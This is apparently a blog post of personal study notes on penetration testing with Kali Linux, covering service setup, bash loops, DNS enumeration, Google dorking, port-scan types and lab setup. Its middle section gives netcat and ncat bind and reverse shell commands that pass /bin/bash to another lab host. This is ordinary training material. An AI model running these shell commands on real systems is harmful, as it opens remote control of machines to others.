Learning Penetration Testing using Kali Linux

June 28, 2016March 14, 2018 Support @QUE.COM 5503 Views 0 Comments HOWTO, Kali Linux, Netcat, Penetration Testing, Pentest

Note: I first wrote this article for Hardworking.com blog, since we moved all content to KING.NET moving forward this version will be up to date.

I’m learning Penetration Testing with Kali Linux and taking notes as I followed the video. This is one way for me to review the old stuff I already knew years ago but stop using because of different project assignments.

Use comments below to post your questions or suggestions.

Let’s begin…

root#Kali:# passwd ; to change the root password. It’s a habit, I want to make sure I’m the only one using this super user.

Starting SSH Service

root#Kali:# service ssh start

Verify the service is running

root#Kali:# netstat -antp |grep sshd ; you will the following output.

To stop the service.

root#Kali:# service ssh stop

Starting HTTP Service

root#Kali:#service apache2 start

To test if the HTTP server is up and running, open internet browser and enter the URL address e.g. http://127.0.0.1

root#Kali:#service apache2 stop

The example above is to update the index.html file with the text “Kali Linux rocks“. Refresh your internet browser to see your changes. Then stop apache service to close your session.

As alternative, you can use the init script to start/stop the service located in /etc/init.d/

For example, using “init” script to start and stop ssh.

Use a command cat to find a certain text in a file. For example, look for “href=” in an index.html file.

and the output shows all “href=reference to the index.html file.

Let us filter this result by using this command.

cat index.html |grep “href=” |cut -d”/” -f3 |grep “cisco.com”more [enter]. The result are much better, simply adding a parameter to the cat command.

We can still make it better. Don’t you think?

The “f3” means field 3, “f1” is field 1.

Here’s an alternative command using “[A-Za-z0-9_,-]” as shown below.

The second command with >cisco.txt is to send the result to a file.

When I tried this using my home computer, the host http://www.cisco.com is showing 23.78.176.170 because they are using akamai service. You might have a different resolving IP address, that’s should be ok. Our goal is to test the command line.

f1 is the FQDN e.g. e144.dscb.akamaiedge.net as shown above.

f2 is the string “has”

f3 is the string “address”

f4 is the IP Address e.g. 88.221.152.170

cut the space delimeter (cut -d” “) to show field 4 (f4)

#host http://www.cisco.com | grep “has address” |cut -d” ” -f4

Now let’s create a bash script.

#nano cisco.sh ; use a text editor nano to create cisco.sh script.

Hardworking.com.Kali.Linux.bash.script.sample

For loop reading cisco.txt, grepping “has address”, cutting the dilimeter space in field 4.

Hardworking.com.Kali.Linux.cisco.sh.sample

We updated cisco.sh script permission to execute 755, run ./cisco.sh script, showing the output.

You can also produce a similar result by typing directly to the command prompt using bash scripting as shown below.

Here an example of ping-loop.sh scrip

#!/bin/bash

for ip in $(seq 200 210); do

echo 192.168.2$ip

done

Save this to ping-loop.sh script file. Change the permission to execute by using the following command.

#chmod 755 ping-loop.sh

Then run it.

#./ping-loop.sh ; this will produce the results.

192.168.2.200

192.168.2.201

192.168.2.202

192.168.2.210

Now let’s using the ping -c 1 counter.

#!/bin/bash

for ip in $(seq 200 210); do

ping -c 1 192.168.2$ip

done

Now let’s review on how to use Bind Shell and Reverse Shell. You need to have two workstation for this exercise, the 1st PC (InsiderPC with IP 192.168.10.100) is in your network and the 2nd PC (OutsiderPC with IP 192.168.10.200) from the outside network.

Using Bind Shell, start this command from your OutsiderPC (Bob workstation).

nc -nvlp 5555 -e /bin/bash ;starting netcat with listening port 5555, of course you can use other port number and allowing the client (InsiderPC) to connect and execute bash shell command prompt. This is to prepare Bob’s workstation to listen using port 5555 so Alice can connect.

From the InsiderPC (Alice workstation), connect using the following command

nc -nv 192.168.10.200 5555 [Enter] the IP address is assigned to the OutsiderPC.

When you type “ifconfig” you will see the IP address of OutsiderPC. You are executing this command from the OutsiderPC.

This is to allow Alice to connect to Bob’s workstation to take control for administration purposes.

Now Reserve Shell. The difference is the client (InsiderPC) will provide the executable

KING.NET.PenTest.Using.Kali.ReverseShell

file. Let’s begin by preparing our OutsiderPC to listen. In OutsiderPC, type the following command.

nc -nvlp 5555

From the InsiderPC, connect using the following command.

nc -nv 192.168.10.200 5555 -e /bin/bash [Enter] the IP address is assigned to the OutsiderPC (Bob’s workstation).

Alice is located in the corporate network with Firewall, she will not be able to accept connection coming from outside (Bob) though Alice can make outbound connection which allow her to connect to Bob’s workstation with the NETCAT connection tied to a local shell. Once this connection is made, Bob then will have access to Alice computer an her behalf. Similar to a remote access tool.

Using the OutsiderPC, type “ifconfig” you will see the InsiderPC ip address because you are using the InsiderPC (Alice) to execute the command.

Please note, using netcat is not encrypted. All transactions are in plain text. The NCAT tool will provide the encryption not available in netcat command. It’s a similar process when you use bind shell or reverse shell.

From the OutsiderPC, type the following command.

ncat -lvp 443 -e /bin/bash –ssl ; ncat will listen to port 443, execute bash shell with ssl (encrypted session)

From the InsiderPC, type the following command.

ncat -v 192.168.10.200 443 –ssl ; now you’re remotely connected to OutsiderPC with encrypted session.

And for the reserve shell, same concept.

From OutsiderPC, enter the following command.

ncat -lvp 443 –ssl

From the InsiderPC, connect using the following command.

ncat -v 192.168.10.200 443 -e /bin/bash –ssl ; now Outsider PC is remotely connected to InsiderPC with encrypted session.

You can use Wireshark to check encrypted session between the two workstations. Try this to your test environment to see how it’s work.

Another example. From Outside PC run the command.

#ncat -lvp 4444 -e /bin/bash –allow 192.168.2.100 –ssl

Run ncat (encrypted) with -lvp using port 444, execute the bash shell, and only allow 192.168.2.100 workstation to using via SSL protocol.

From Inside PC. #ncat -v 192.168.2.200 4444 –ssl

You will see a NCAT SHA-1 fingertprint, Certification verification and SSL connection to the target workstation.

Passive Gathering or passive information gathering is to find all information about your target. Google Search is an excellent tool. Here is an example, type this in google search page.

site:”Microsoft.com” filetype:ppt “penetration testing” we are using Microsoft.com domain with filetype operator to look for a powerpoint file using PPT extension for a specific phrase “penetration testing”. Run this to your browser and review the results.

Another example using intitle operator, enter this to your google search page intitle:”VNC viewer for Java”

And if you’re interested to learn other google search operators, visit this website http://www.googleguide.com/advanced_operators_reference.html.

Use Google Hacking Database (GHDB) now known as The Exploit Database at exploit-db.com site.

How about Active Gathering? Now using one your penetration testing tools such as port scan, dns scanning, enumeration, vulnerability scanning, etc. Please note, test only in your working environment.

Let’s test hardworking.com DNS enumeration, type the following command changing the domain name using your own website so you will see the results you expect.

host -t ns hardworkingc.com [Enter] ;where -t option is used to select the query type. In our example, the query type is ns for name server testing for hardworking.com domain name. You suppose to see two name servers such as nash.ns.cloudflare.com and arya.ns.cloudflare.com.

host -t mx hardworking.com [Enter] ; if you guess mail exchange information, you are correct. We are using Google for Work email hosting.

If you don’t have access to a linux box to run these command line, you can use a free online tools such as NetworkQuery.com, DNSStuff.com, etc.

To extend DNS enumeration, you can use the forward and reverse DNS to get more information.

Connect Scan or TCP connect relies on three way handshake.

Syn Scanning or Half-connect or Stealth Scan sending syn packet without completing the TCP handshake.

UDP Scan stateless and does not involve three way handshake.

NMAP is a swiss tool for every admin or network administrator out there. If you don’t have it, go download this tool and add to your arsenal of networking tools.

Before I go on, let me setup my lab workstation and connection.

Visit VMware.com website to download the Workstation Player, here’s the link https://www.vmware.com/products/player/. Download the right program for your lab workstation. I’m using Windows 10, so I will download the 64-bit version. Install it by default, then open the Kali Linux PWK VM image provided to you.

Once your Kali Linux PWK VM image is up and running, don’t forget to change your root password to something new. Keep in mind, you will be connect to a lab environment where other ethical hacker will be curious to find out (hack) your test workstation.

Setting up OpenVPN. Download the lab connection configuration, the link should be provided to your email. Initiate the download from a running Kali Linux PWK VM image, you should be able to see it at /root/Download/.

Extract by running this command “tar jxpf lab-connection.tar.bz2” [Enter]

#cd lab-connections

Start OpenVPN session. root@kali:~/Downloads/lab-connection/ openvpn lab-connection.conf [Enter]. This will prompt to enter your username and password. If connected properly, you should see Initialization Sequence Completed.

If you can’t connect from your work network maybe a Firewall is blocking your openvpn connection. Make sure you open up TCP 443, TCP 943 and UDP 1194. I’ve tested it. Once connected, leave it. Open another terminal console to check your new IP address assigned to you when you are connected via OpenVPN. Type the command ifconfig tap0 (or only ifconfig will also work). To test your OpenVPN connection, ping one of the lab server IP.

Dedicated Windows 7 Virtual Machine. Go to your Student Control Panel to power on your Windows 7. After that, in terminal console run rdesktop -u xxxx -p yyyy 192.168.xx.xx to connect to your Windows 7 Virtual Machine.

Enjoy your lab.

Updating …. come back again for update.